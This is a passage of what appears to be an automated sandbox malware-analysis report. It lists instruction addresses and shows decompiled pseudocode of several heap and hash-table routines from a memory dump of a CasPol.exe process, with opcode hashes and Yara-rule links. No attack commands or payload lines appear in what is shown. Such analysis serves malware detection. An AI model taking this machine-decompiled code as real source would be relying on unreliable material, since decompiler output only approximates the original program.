                                                                        0x01427a6c
                                                                        0x01427a6e
                                                                        0x014279cb
                                                                        0x014279cb
                                                                        0x014279ce
                                                                        0x014279d0
                                                                        0x01427a98
                                                                        0x01427a9b
                                                                        0x01427a9b
                                                                        0x01427a9e
                                                                        0x01427aa1
                                                                        0x01427bbe
                                                                        0x01427bbe
                                                                        0x01427bc0
                                                                        0x01427be0
                                                                        0x01427be0
                                                                        0x01427a01
                                                                        0x01427a01
                                                                        0x01427a05
                                                                        0x01427a07
                                                                        0x01427a15
                                                                        0x01427a15
                                                                        0x01427a1a
                                                                        0x00000000
                                                                        0x01427a1a
                                                                        0x01427bc2
                                                                        0x01427bc6
                                                                        0x01427bc9
                                                                        0x01427bcd
                                                                        0x01427bcf
                                                                        0x014279e6
                                                                        0x014279e6
                                                                        0x014279eb
                                                                        0x014279eb
                                                                        0x014279ef
                                                                        0x014279f1
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x014279f3
                                                                        0x014279f5
                                                                        0x014279ff
                                                                        0x014279ff
                                                                        0x00000000
                                                                        0x014279ff
                                                                        0x014279f7
                                                                        0x014279fd
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x014279fd
                                                                        0x01427bd5
                                                                        0x01427bd8
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x01427ba9
                                                                        0x01427bac
                                                                        0x01427bb0
                                                                        0x01427bb1
                                                                        0x01427bb1
                                                                        0x01427bb6
                                                                        0x00000000
                                                                        0x01427bb6
                                                                        0x01427aa7
                                                                        0x01427aaa
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x01427ab2
                                                                        0x01427ab3
                                                                        0x01427ab5
                                                                        0x01427aec
                                                                        0x01427aef
                                                                        0x01427b25
                                                                        0x01427b28
                                                                        0x01427b62
                                                                        0x01427b64
                                                                        0x01427b8f
                                                                        0x01427b92
                                                                        0x01427b96
                                                                        0x01427b98
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x01427b9e
                                                                        0x01427b9f
                                                                        0x01427ba3
                                                                        0x00000000
                                                                        0x01427ba3
                                                                        0x01427b66
                                                                        0x01427b68
                                                                        0x01427ae2
                                                                        0x01427ae2
                                                                        0x00000000
                                                                        0x01427ae2
                                                                        0x01427b6e
                                                                        0x01427b72
                                                                        0x01427b75
                                                                        0x01427b81
                                                                        0x01427b85
                                                                        0x01427b87
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x01427b31
                                                                        0x01427b34
                                                                        0x01427b3c
                                                                        0x01427b45
                                                                        0x01427b46
                                                                        0x01427b4f
                                                                        0x01427b51
                                                                        0x01427b57
                                                                        0x01427b59
                                                                        0x01427b59
                                                                        0x00000000
                                                                        0x01427b59
                                                                        0x01427b77
                                                                        0x00000000
                                                                        0x01427b77
                                                                        0x01427b2a
                                                                        0x00000000
                                                                        0x01427b2a
                                                                        0x01427af1
                                                                        0x01427af3
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x01427afb
                                                                        0x01427afc
                                                                        0x01427afe
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x01427b00
                                                                        0x01427b03
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x01427b05
                                                                        0x01427b09
                                                                        0x01427b0d
                                                                        0x01427b0f
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x01427b18
                                                                        0x01427b1d
                                                                        0x00000000
                                                                        0x01427b1d
                                                                        0x01427ab7
                                                                        0x01427ab9
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x01427abf
                                                                        0x01427ac1
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x01427ac3
                                                                        0x01427ac6
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x01427ac8
                                                                        0x01427acc
                                                                        0x01427ad0
                                                                        0x01427ad2
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x01427adb
                                                                        0x00000000
                                                                        0x01427adb
                                                                        0x014279d6
                                                                        0x014279d9
                                                                        0x014279dc
                                                                        0x01427a91
                                                                        0x01427a94
                                                                        0x00000000
                                                                        0x01427a94
                                                                        0x014279e2
                                                                        0x00000000
                                                                        0x014279e2
                                                                        0x01427a74
                                                                        0x01427a7a
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x01427a8a
                                                                        0x01427a21
                                                                        0x01427a21
                                                                        0x00000000
                                                                        0x01427a21
                                                                        0x013bc650
                                                                        0x013bc651
                                                                        0x013bc656
                                                                        0x013bc65c
                                                                        0x013bc65d
                                                                        0x013bc663
                                                                        0x013bc664
                                                                        0x013bc66a
                                                                        0x013bc66e
                                                                        0x014279c5
                                                                        0x014279c7
                                                                        0x00000000
                                                                        0x014279c7
                                                                        0x013bc67a
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1390000_CasPol.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 8afa9d35ffc243b1a73574168b470cd1a0e572365fa2e10c7ccf4dc27e8f25ee
                                                                        • Instruction ID: 87ec07c5b7612ffa5275efb4657fbb068ce553ca9960bbba714e30acfb1fb5b7
                                                                        • Opcode Fuzzy Hash: 8afa9d35ffc243b1a73574168b470cd1a0e572365fa2e10c7ccf4dc27e8f25ee
                                                                        • Instruction Fuzzy Hash: 2C8194756043118BDB26CE58C880B6BB7E4FBA4365F94482FEE459B361D330DD81CB91
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 014703DA Relevance: .2, Instructions: 218COMMONCrypto
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 73%
                                                                        			E014703DA(signed int* __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				intOrPtr* _v16;
				signed int* _v20;
				signed int _v24;
				signed char _v28;
				signed int _v32;
				signed int* _v36;
				void* __ebx;
				void* __edi;
				intOrPtr* _t80;
				signed int _t87;
				signed char _t90;
				signed int _t107;
				intOrPtr* _t119;
				signed int _t120;
				signed int _t121;
				signed char _t127;
				void* _t129;
				intOrPtr* _t130;
				signed int _t137;
				signed int _t139;
				signed int _t141;
				signed int _t144;
				signed char _t148;
				signed int _t154;
				signed char _t155;
				signed int _t164;
				unsigned int _t167;
				signed int _t168;
				signed int _t170;
				unsigned int _t173;
				signed int* _t174;
				signed int _t175;
				intOrPtr* _t177;
				signed int _t178;
				signed int _t179;
				signed int _t180;
				signed char _t183;
				intOrPtr _t184;
				unsigned int _t186;
				unsigned int _t187;

				_push( *0x14a634c);
				_t119 = __ecx;
				_t184 = __edx;
				_push( *0x14a6348);
				_v20 = __ecx;
				_push(0);
				_t129 = 0xc;
				_t80 = E0147BBBB(_t129, _t129);
				_t130 = _t80;
				_v16 = _t130;
				if(_t130 == 0) {
					return _t80;
				}
				 *((intOrPtr*)(_t130 + 8)) = _a4;
				_t82 =  &(__ecx[1]);
				 *((intOrPtr*)(_t130 + 4)) = _t184;
				_v36 =  &(__ecx[1]);
				E013D2280( &(__ecx[1]), _t82);
				_v12 = 1;
				 *_t119 =  *((intOrPtr*)( *[fs:0x18] + 0x24));
				_t120 = _t119 + 8;
				_t175 =  *(_t120 + 4);
				_t87 = _t175 >> 5;
				if( *_t120 < _t87 + _t87) {
					L22:
					_t186 = _t175 >> 5;
					_t177 = _v16;
					_t90 = (_t87 | 0xffffffff) << (_t175 & 0x0000001f) &  *(_t177 + 4);
					_v8 = _t90;
					_t137 =  *(_t120 + 8);
					_v8 = (_v8 >> 0x18) + ((_v8 >> 0x00000010 & 0x000000ff) + ((_t90 >> 0x00000008 & 0x000000ff) + ((_t90 & 0x000000ff) + 0xb15dcb) * 0x25) * 0x25) * 0x25;
					_t67 = _t186 - 1; // 0xffffffdf
					_t164 = _t67 & _v8;
					 *_t177 =  *((intOrPtr*)(_t137 + _t164 * 4));
					 *((intOrPtr*)(_t137 + _t164 * 4)) = _t177;
					 *_t120 =  *_t120 + 1;
					_t178 = 0;
					L23:
					 *_v20 =  *_v20 & 0x00000000;
					E013CFFB0(_t120, _t178, _v36);
					if(_t178 != 0) {
						E0147BCD2(_t178,  *0x14a6348,  *0x14a634c);
					}
					return _v12;
				}
				_t139 = 2;
				_t87 = E013EF3D5( &_v8, _t87 * _t139, _t87 * _t139 >> 0x20);
				if(_t87 < 0) {
					goto L22;
				}
				_t187 = _v8;
				if(_t187 < 4) {
					_t187 = 4;
				}
				_push(0);
				_t87 = E01470150(_t187 << 2);
				_t179 = _t87;
				_v8 = _t179;
				if(_t179 == 0) {
					_t175 =  *(_t120 + 4);
					if(_t175 >= 0x20) {
						goto L22;
					}
					_v12 = _v12 & 0x00000000;
					_t178 = _v16;
					goto L23;
				} else {
					_t19 = _t187 - 1; // 0x3
					_t141 = _t19;
					if((_t187 & _t141) == 0) {
						L10:
						if(_t187 > 0x4000000) {
							_t187 = 0x4000000;
						}
						_v28 = _v28 & 0x00000000;
						_t167 = _t187 << 2;
						_t107 = _t120 | 0x00000001;
						_v24 = _t179;
						_t168 = _t167 >> 2;
						asm("sbb ecx, ecx");
						_t144 =  !(_t167 + _t179) & _t168;
						if(_t144 <= 0) {
							L15:
							_t180 = 0;
							_t170 = (_t168 | 0xffffffff) << ( *(_t120 + 4) & 0x0000001f);
							_v24 = _t170;
							if(( *(_t120 + 4) & 0xffffffe0) <= 0) {
								L20:
								_t147 =  *(_t120 + 8);
								_t87 = _v8;
								_t175 =  *(_t120 + 4) & 0x0000001f | _t187 << 0x00000005;
								 *(_t120 + 8) = _t87;
								 *(_t120 + 4) = _t175;
								if( *(_t120 + 8) != 0) {
									_push(0);
									_t87 = E01470180(_t147);
									_t175 =  *(_t120 + 4);
								}
								goto L22;
							} else {
								goto L16;
							}
							do {
								L16:
								_t121 =  *(_t120 + 8);
								_v32 = _t121;
								while(1) {
									_t148 =  *(_t121 + _t180 * 4);
									_v28 = _t148;
									if((_t148 & 0x00000001) != 0) {
										goto L19;
									}
									 *(_t121 + _t180 * 4) =  *_t148;
									_t124 =  *(_t148 + 4) & _t170;
									_t173 = _v8;
									_t154 = _t187 - 0x00000001 & (( *(_t148 + 4) & _t170) >> 0x00000018) + ((( *(_t148 + 4) & _t170) >> 0x00000010 & 0x000000ff) + ((_t124 >> 0x00000008 & 0x000000ff) + ((_t124 & 0x000000ff) + 0x00b15dcb) * 0x00000025) * 0x00000025) * 0x00000025;
									_t127 = _v28;
									 *_t127 =  *(_t173 + _t154 * 4);
									 *(_t173 + _t154 * 4) = _t127;
									_t170 = _v24;
									_t121 = _v32;
								}
								L19:
								_t180 = _t180 + 1;
								_t120 =  &(_v20[2]);
							} while (_t180 <  *(_t120 + 4) >> 5);
							goto L20;
						} else {
							_t174 = _t179;
							_t183 = _v28;
							do {
								_t183 = _t183 + 1;
								 *_t174 = _t107;
								_t174 =  &(_t174[1]);
							} while (_t183 < _t144);
							goto L15;
						}
					}
					_t155 = _t141 | 0xffffffff;
					if(_t187 == 0) {
						L9:
						_t187 = 1 << _t155;
						goto L10;
					} else {
						goto L8;
					}
					do {
						L8:
						_t155 = _t155 + 1;
						_t187 = _t187 >> 1;
					} while (_t187 != 0);
					goto L9;
				}
			}













































                                                                        0x014703e5
                                                                        0x014703eb
                                                                        0x014703ed
                                                                        0x014703ef
                                                                        0x014703f5
                                                                        0x014703f8
                                                                        0x014703fc
                                                                        0x014703ff
                                                                        0x01470404
                                                                        0x01470406
                                                                        0x0147040b
                                                                        0x01470619
                                                                        0x01470619
                                                                        0x01470414
                                                                        0x01470417
                                                                        0x0147041b
                                                                        0x0147041e
                                                                        0x01470421
                                                                        0x0147042c
                                                                        0x01470436
                                                                        0x01470438
                                                                        0x0147043b
                                                                        0x01470440
                                                                        0x01470448
                                                                        0x0147058e
                                                                        0x01470596
                                                                        0x0147059b
                                                                        0x014705a0
                                                                        0x014705a3
                                                                        0x014705d1
                                                                        0x014705d6
                                                                        0x014705d9
                                                                        0x014705dc
                                                                        0x014705e2
                                                                        0x014705e4
                                                                        0x014705e7
                                                                        0x014705e9
                                                                        0x014705eb
                                                                        0x014705f1
                                                                        0x014705f4
                                                                        0x014705fb
                                                                        0x0147060b
                                                                        0x0147060b
                                                                        0x00000000
                                                                        0x01470610
                                                                        0x01470450
                                                                        0x01470458
                                                                        0x0147045f
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x01470465
                                                                        0x0147046b
                                                                        0x0147046f
                                                                        0x0147046f
                                                                        0x01470472
                                                                        0x01470478
                                                                        0x0147047d
                                                                        0x0147047f
                                                                        0x01470484
                                                                        0x0147061c
                                                                        0x01470622
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x01470628
                                                                        0x0147062c
                                                                        0x00000000
                                                                        0x0147048a
                                                                        0x0147048a
                                                                        0x0147048a
                                                                        0x0147048f
                                                                        0x014704a2
                                                                        0x014704a9
                                                                        0x014704ab
                                                                        0x014704ab
                                                                        0x014704ad
                                                                        0x014704b3
                                                                        0x014704b8
                                                                        0x014704bb
                                                                        0x014704c1
                                                                        0x014704c6
                                                                        0x014704ca
                                                                        0x014704cc
                                                                        0x014704dd
                                                                        0x014704e6
                                                                        0x014704e8
                                                                        0x014704f1
                                                                        0x014704f4
                                                                        0x01470568
                                                                        0x0147056b
                                                                        0x01470571
                                                                        0x01470577
                                                                        0x01470579
                                                                        0x0147057c
                                                                        0x01470581
                                                                        0x01470583
                                                                        0x01470586
                                                                        0x0147058b
                                                                        0x0147058b
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x014704f6
                                                                        0x014704f6
                                                                        0x014704f6
                                                                        0x014704f9
                                                                        0x014704fc
                                                                        0x014704fc
                                                                        0x014704ff
                                                                        0x01470505
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x01470509
                                                                        0x0147050f
                                                                        0x01470532
                                                                        0x01470542
                                                                        0x01470544
                                                                        0x0147054a
                                                                        0x0147054c
                                                                        0x0147054f
                                                                        0x01470552
                                                                        0x01470552
                                                                        0x01470557
                                                                        0x0147055a
                                                                        0x0147055b
                                                                        0x01470564
                                                                        0x00000000
                                                                        0x014704ce
                                                                        0x014704ce
                                                                        0x014704d0
                                                                        0x014704d3
                                                                        0x014704d3
                                                                        0x014704d4
                                                                        0x014704d6
                                                                        0x014704d9
                                                                        0x00000000
                                                                        0x014704d3
                                                                        0x014704cc
                                                                        0x01470491
                                                                        0x01470496
                                                                        0x0147049d
                                                                        0x014704a0
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x01470498
                                                                        0x01470498
                                                                        0x01470498
                                                                        0x01470499
                                                                        0x01470499
                                                                        0x00000000
                                                                        0x01470498

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1390000_CasPol.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 8746c7eb7d26581d1a0cfcc42745b050fd7175e6f5f75e9d040999c8903e8f78
                                                                        • Instruction ID: a719044792131ecbd551f4ecc34ada2574bcad357448de4e44feecc34b030579
                                                                        • Opcode Fuzzy Hash: 8746c7eb7d26581d1a0cfcc42745b050fd7175e6f5f75e9d040999c8903e8f78
                                                                        • Instruction Fuzzy Hash: 9371D672A012159BDB24CF5CC980BAEBBF2EB85310F19826AE9159F395C731ED41CB90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0147D616 Relevance: .2, Instructions: 216COMMONCrypto
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 60%
                                                                        			E0147D616(signed int __ecx, intOrPtr __edx, signed int _a4) {
				signed int _v8;
				signed int _v12;
				signed char _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				unsigned int _v36;
				intOrPtr _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t79;
				signed char _t86;
				signed int _t88;
				void* _t91;
				signed int _t94;
				signed int _t95;
				unsigned int _t96;
				signed int _t110;
				signed char _t118;
				intOrPtr _t120;
				signed int _t123;
				signed int _t124;
				signed char _t131;
				signed int _t133;
				signed int _t137;
				signed char _t147;
				signed int _t153;
				signed int _t159;
				signed int _t160;
				signed int _t161;
				signed int _t164;
				signed int _t169;
				signed int _t173;

				_v8 =  *0x14ad360 ^ _t173;
				_t120 = __edx;
				_t159 = __ecx;
				_v40 = __edx;
				_t150 =  *(__edx + 1) & 0x000000ff;
				_t174 =  *0x14a610c & 0x00000001;
				_t160 = 0;
				_v24 = 0;
				_v28 =  *(0x139aef0 + ( *(__edx + 1) & 0x000000ff) * 2) & 0x0000ffff;
				if(( *0x14a610c & 0x00000001) == 0) {
					_v12 = 0;
				} else {
					_v12 = E0147C70A(__ecx + 0x38, _t150);
				}
				_t79 = E0147C5FF(_t120, 0, _t174);
				_t153 = _t79 * _v28;
				_v36 = _t153;
				_v32 = (0x00000027 + (0x0000001f + _t79 * 0x00000002 >> 0x00000005) * 0x00000004 & 0xfffffff8) + ((0x00000027 + (0x0000001f + _t79 * 0x00000002 >> 0x00000005) * 0x00000004 & 0xfffffff8) + 0xfff + _t153 >> 0xc) * 2;
				_t86 = E0147A359((0x00000027 + (0x0000001f + _t79 * 0x00000002 >> 0x00000005) * 0x00000004 & 0xfffffff8) + ((0x00000027 + (0x0000001f + _t79 * 0x00000002 >> 0x00000005) * 0x00000004 & 0xfffffff8) + 0xfff + _t153 >> 0xc) * 2 + _t153,  *((intOrPtr*)(_t159 + 0x2c)));
				_t131 = _t86;
				_v16 = _t86;
				if(_t131 <= 0xc) {
					_t131 = 0xc;
					_v16 = _t131;
				}
				_t123 = 1 << _t131;
				_v20 = 1;
				if(( *0x14a610c & 0x00000008) == 0) {
					L11:
					_t88 = 1;
					__eflags = 1;
					L12:
					_t133 = _a4 & _t88;
					_v32 = _t133;
					if(_t133 == 0) {
						L013DFAD0(_t159 + 0x34);
					}
					_t134 = _t159 + (_v16 + 0xfffffffc) * 8;
					_t91 = 0;
					if( *((intOrPtr*)(_t159 + (_v16 + 0xfffffffc) * 8 + 4)) == 0) {
						_t124 = 0;
					} else {
						_t124 = E013E1710(_t134);
						_t91 = 0;
					}
					if(_t124 != 0) {
						_t94 = 1 <<  *(_t124 + 0x1c);
						__eflags = 1;
						goto L22;
					} else {
						 *0x14ab1e0( *_t159, _v20, _t91, _a4);
						_t124 =  *( *(_t159 + 4) ^  *0x14a6110 ^ _t159)();
						if(_t124 != 0) {
							_t94 = 0;
							_t160 = 0;
							L22:
							__eflags =  *0x14a610c & 0x00000002;
							_v16 = _t94;
							if(( *0x14a610c & 0x00000002) == 0) {
								L25:
								_t95 = E0147D597(_v20, _v28);
								_t156 = _t95;
								_v12 = _t95;
								L26:
								_t96 = _v16;
								__eflags = _t96;
								if(_t96 != 0) {
									__eflags =  *((char*)(_t124 + 0x1d)) - 1;
									if( *((char*)(_t124 + 0x1d)) > 1) {
										_t169 = _t96 >> 0xc;
										__eflags = _t169;
										_t160 =  ~_t169;
										_v24 = _t160;
									}
								}
								__eflags = _t96 - _t156;
								if(_t96 >= _t156) {
									L33:
									_t137 = _v20;
									__eflags = _t156 - _t137;
									if(_t156 != _t137) {
										_t160 = _t160 + (_t156 >> 0xc);
										__eflags = _t160;
									}
									__eflags = _t160;
									if(_t160 != 0) {
										asm("lock xadd [eax], esi");
									}
									_push(_t137);
									_t156 = _t137;
									E0147DEF6(_t124, _t137, _t137, _v28);
									asm("lock inc dword [eax+0x20]");
									asm("lock xadd [eax], ecx");
									_t161 = _t124;
									_t124 = 0;
									__eflags = 0;
									goto L38;
								} else {
									 *0x14ab1e0( *_t159, _t124, _t156);
									_t110 =  *( *(_t159 + 0xc) ^  *0x14a6110 ^ _t159)();
									__eflags = _t110;
									if(_t110 >= 0) {
										_t160 = _v24;
										_t156 = _v12;
										goto L33;
									}
									_t161 = 0;
									L38:
									_v12 = _t161;
									__eflags = _t124;
									if(_t124 != 0) {
										_t164 =  *(_t159 + 8) ^  *0x14a6110 ^ _t159;
										__eflags = _t164;
										 *0x14ab1e0( *_t159, _t124, _v20, _a4);
										 *_t164();
										_t161 = _v12;
									}
									L40:
									if(_v32 == 0) {
										E013DFA00(_t124, _t159 + 0x34, _t159, _t159 + 0x34);
									}
									return E013FB640(_t161, _t124, _v8 ^ _t173, _t156, _t159, _t161);
								}
							}
							__eflags = _v12;
							if(_v12 == 0) {
								goto L25;
							}
							_t156 = _v20;
							_v12 = _t156;
							goto L26;
						}
						_t161 = 0;
						goto L40;
					}
				}
				_t146 = _v36;
				if(_v32 > _v36 >> 6) {
					goto L11;
				}
				_t118 = E0147A359(_t146,  *((intOrPtr*)(_t159 + 0x2c)));
				_t147 = _t118;
				_v16 = _t118;
				if(_t147 <= 0xc) {
					_t147 = 0xc;
					_v16 = _t147;
				}
				_t88 = 1;
				_t156 = 1 << _t147;
				if(_t123 > 1) {
					_v20 = 1;
				}
				goto L12;
			}






































                                                                        0x0147d625
                                                                        0x0147d629
                                                                        0x0147d62d
                                                                        0x0147d62f
                                                                        0x0147d632
                                                                        0x0147d638
                                                                        0x0147d63f
                                                                        0x0147d641
                                                                        0x0147d64c
                                                                        0x0147d64f
                                                                        0x0147d660
                                                                        0x0147d651
                                                                        0x0147d659
                                                                        0x0147d659
                                                                        0x0147d667
                                                                        0x0147d66e
                                                                        0x0147d67c
                                                                        0x0147d69a
                                                                        0x0147d6a0
                                                                        0x0147d6a5
                                                                        0x0147d6a7
                                                                        0x0147d6ad
                                                                        0x0147d6b1
                                                                        0x0147d6b2
                                                                        0x0147d6b2
                                                                        0x0147d6b8
                                                                        0x0147d6c1
                                                                        0x0147d6c4
                                                                        0x0147d6fb
                                                                        0x0147d6fd
                                                                        0x0147d6fd
                                                                        0x0147d6fe
                                                                        0x0147d701
                                                                        0x0147d703
                                                                        0x0147d706
                                                                        0x0147d70c
                                                                        0x0147d70c
                                                                        0x0147d717
                                                                        0x0147d71a
                                                                        0x0147d720
                                                                        0x0147d72d
                                                                        0x0147d722
                                                                        0x0147d727
                                                                        0x0147d729
                                                                        0x0147d729
                                                                        0x0147d731
                                                                        0x0147d76a
                                                                        0x0147d76a
                                                                        0x00000000
                                                                        0x0147d733
                                                                        0x0147d749
                                                                        0x0147d751
                                                                        0x0147d755
                                                                        0x0147d75e
                                                                        0x0147d760
                                                                        0x0147d76c
                                                                        0x0147d76c
                                                                        0x0147d773
                                                                        0x0147d776
                                                                        0x0147d786
                                                                        0x0147d78c
                                                                        0x0147d791
                                                                        0x0147d793
                                                                        0x0147d796
                                                                        0x0147d796
                                                                        0x0147d799
                                                                        0x0147d79b
                                                                        0x0147d79d
                                                                        0x0147d7a1
                                                                        0x0147d7a5
                                                                        0x0147d7a5
                                                                        0x0147d7a8
                                                                        0x0147d7aa
                                                                        0x0147d7aa
                                                                        0x0147d7a1
                                                                        0x0147d7ad
                                                                        0x0147d7af
                                                                        0x0147d7d8
                                                                        0x0147d7d8
                                                                        0x0147d7db
                                                                        0x0147d7dd
                                                                        0x0147d7e4
                                                                        0x0147d7e4
                                                                        0x0147d7e4
                                                                        0x0147d7e6
                                                                        0x0147d7e8
                                                                        0x0147d7f0
                                                                        0x0147d7f0
                                                                        0x0147d7f4
                                                                        0x0147d7f9
                                                                        0x0147d7fd
                                                                        0x0147d805
                                                                        0x0147d810
                                                                        0x0147d814
                                                                        0x0147d816
                                                                        0x0147d816
                                                                        0x00000000
                                                                        0x0147d7b1
                                                                        0x0147d7c2
                                                                        0x0147d7c8
                                                                        0x0147d7ca
                                                                        0x0147d7cc
                                                                        0x0147d7d2
                                                                        0x0147d7d5
                                                                        0x00000000
                                                                        0x0147d7d5
                                                                        0x0147d7ce
                                                                        0x0147d818
                                                                        0x0147d818
                                                                        0x0147d81b
                                                                        0x0147d81d
                                                                        0x0147d831
                                                                        0x0147d831
                                                                        0x0147d835
                                                                        0x0147d83b
                                                                        0x0147d83d
                                                                        0x0147d83d
                                                                        0x0147d840
                                                                        0x0147d844
                                                                        0x0147d84a
                                                                        0x0147d84a
                                                                        0x0147d861
                                                                        0x0147d861
                                                                        0x0147d7af
                                                                        0x0147d778
                                                                        0x0147d77c
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0147d77e
                                                                        0x0147d781
                                                                        0x00000000
                                                                        0x0147d781
                                                                        0x0147d757
                                                                        0x00000000
                                                                        0x0147d757
                                                                        0x0147d731
                                                                        0x0147d6c6
                                                                        0x0147d6d1
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0147d6d6
                                                                        0x0147d6db
                                                                        0x0147d6dd
                                                                        0x0147d6e3
                                                                        0x0147d6e7
                                                                        0x0147d6e8
                                                                        0x0147d6e8
                                                                        0x0147d6ed
                                                                        0x0147d6f0
                                                                        0x0147d6f4
                                                                        0x0147d6f6
                                                                        0x0147d6f6
                                                                        0x00000000

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1390000_CasPol.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: ede793e2152c5efd9d9f7c9ffcf63a3e116bee8f8793cba23a644675587d19b6
                                                                        • Instruction ID: e550a6b04ea6ee9a7f9b12430df6e0e80dba58f8fc0372a60459ba2302967bd9
                                                                        • Opcode Fuzzy Hash: ede793e2152c5efd9d9f7c9ffcf63a3e116bee8f8793cba23a644675587d19b6
                                                                        • Instruction Fuzzy Hash: CF81A271E1026A9BCB14DFA9C8806AEFBF5FF48300F19816AD515E7361EB30A911CF80
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0146FA2B Relevance: .2, Instructions: 214COMMONCrypto
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 25%
                                                                        			E0146FA2B(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t98;
				signed char _t106;
				intOrPtr _t107;
				signed char _t114;
				signed short _t116;
				signed short _t117;
				signed short _t121;
				signed short _t123;
				signed int* _t127;
				signed int _t128;
				signed int _t130;
				signed short _t134;
				void* _t135;
				signed int* _t136;
				void* _t138;
				signed int _t148;
				signed int _t154;
				signed int _t156;
				signed int _t157;
				intOrPtr _t163;
				intOrPtr _t168;
				void* _t169;
				intOrPtr _t171;

				_t157 = __edx;
				_push(0x2c);
				_push(0x1490e38);
				_t98 = E0140D08C(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t169 - 0x34)) = __edx;
				_t168 = __ecx;
				 *((intOrPtr*)(_t169 - 0x38)) = __ecx;
				 *((intOrPtr*)(_t169 - 0x20)) = 0;
				 *((intOrPtr*)(_t169 - 0x1c)) = 0;
				_t171 =  *0x14a7bc8; // 0x0
				if(_t171 == 0) {
					 *((intOrPtr*)(_t169 - 4)) = 0;
					_t148 =  *__edx;
					 *(_t169 - 0x2c) = _t148 & 0x0000ffff;
					 *(_t169 - 0x28) = _t148 >> 0x18;
					 *(_t169 - 0x24) = _t148 >> 8;
					_t106 = _t148 >> 0x10;
					if(( *(__ecx + 0x4c) & _t148) == 0) {
						 *((intOrPtr*)(_t169 - 0x1c)) = 0xa;
						if(( *(__ecx + 0x40) & 0x04000000) != 0 ||  *(_t169 - 0x28) == (_t106 ^ _t148 ^  *(_t169 - 0x24))) {
							_t148 =  *(_t169 - 0x2c) & 0x0000ffff;
							 *((intOrPtr*)(_t169 - 0x1c)) = 1;
							_t114 =  *((intOrPtr*)(_t157 + 6));
							if(_t114 == 0) {
								_t163 = _t168;
							} else {
								_t163 = (1 - (_t114 & 0x000000ff) << 0x10) + (_t157 & 0xffff0000);
							}
							 *((intOrPtr*)(_t169 - 0x20)) = _t163;
							_t116 = _t148 & 0x0000ffff;
							if( *((intOrPtr*)(_t163 + 8)) == 0xffeeffee) {
								_t148 =  *((intOrPtr*)(_t157 + 7));
								if(_t148 == 4) {
									L12:
									_t117 = _t116 & 0x0000ffff;
									 *(_t169 - 0x2c) = _t117;
									 *((intOrPtr*)(_t169 - 0x1c)) = 3;
									if(_t148 != 3) {
										 *((intOrPtr*)(_t169 - 0x1c)) = 6;
										_t148 =  *(_t168 + 0x54) & 0x0000ffff;
										 *(_t169 - 0x24) = _t148;
										_push(0);
										_pop(0);
										if(( *(_t157 + 4 + (_t117 & 0x0000ffff) * 8) ^ _t148) ==  *(_t169 - 0x2c)) {
											_t121 = _t148;
											goto L23;
										}
									} else {
										_t30 = _t157 + 8; // 0x8
										_t148 = _t30;
										_t130 =  *(_t148 + 0x10);
										if((_t130 & 0x00000fff) == 0 && _t130 >=  *((intOrPtr*)(_t163 + 0x1c)) &&  *((intOrPtr*)(_t148 + 0x14)) +  *(_t148 + 0x10) <=  *((intOrPtr*)(_t163 + 0x28))) {
											 *((intOrPtr*)(_t169 - 0x1c)) = 4;
											_t148 =  *_t148;
											_t134 =  *( *(_t157 + 0xc));
											 *(_t169 - 0x2c) = _t134;
											if(_t134 ==  *((intOrPtr*)(_t148 + 4))) {
												_t42 = _t157 + 8; // 0x8
												_t135 = _t42;
												if( *(_t169 - 0x2c) == _t135) {
													 *((intOrPtr*)(_t169 - 0x1c)) = 5;
													_t136 = _t135 + 8;
													 *(_t169 - 0x2c) = _t136;
